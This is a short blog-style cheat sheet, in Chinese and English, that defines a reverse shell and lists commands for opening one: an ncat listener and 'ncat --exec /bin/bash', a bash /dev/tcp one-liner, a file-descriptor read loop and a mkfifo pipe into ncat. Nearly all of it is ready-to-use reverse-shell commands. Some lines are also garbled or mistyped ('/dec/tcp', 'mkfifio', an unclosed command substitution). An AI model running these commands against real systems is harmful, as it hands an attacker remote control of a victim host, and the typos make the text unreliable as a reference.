反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
ncat:
attacker
ncat --listen --source-port 5555 --keep-open
victim
ncat --exec /bin/bash IP 5555
bash -i >& /dev/tcp/intrinsic/5555 0<&1
This snippet runs a new interactive instance of bash (bash -i), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection
(>& /dec/tcp/HOST/PORT), and standard input is read through this connection (0>&1) this should be 0<&1, but 0>&1 works too
echo b c > /dev/tcp/HOST/PORT
exec 5<> /dev/tcp/HOST/PORT cat <&5 | while read line; do $line >&5 2>&1 done
file=$(mktemp --dry-run -p /tmp --suffix .pipe tmp.XXX mkfifio --mode=700 $file cat $file | bash -i 2>&1 | ncat HOST PORT > $file
cat output pipe content to bash, bash execute, nc pipe the output to pipe
标签:shell,reverse,--,tcp,PORT,bash From: https://www.cnblogs.com/dissipate/p/17085694.html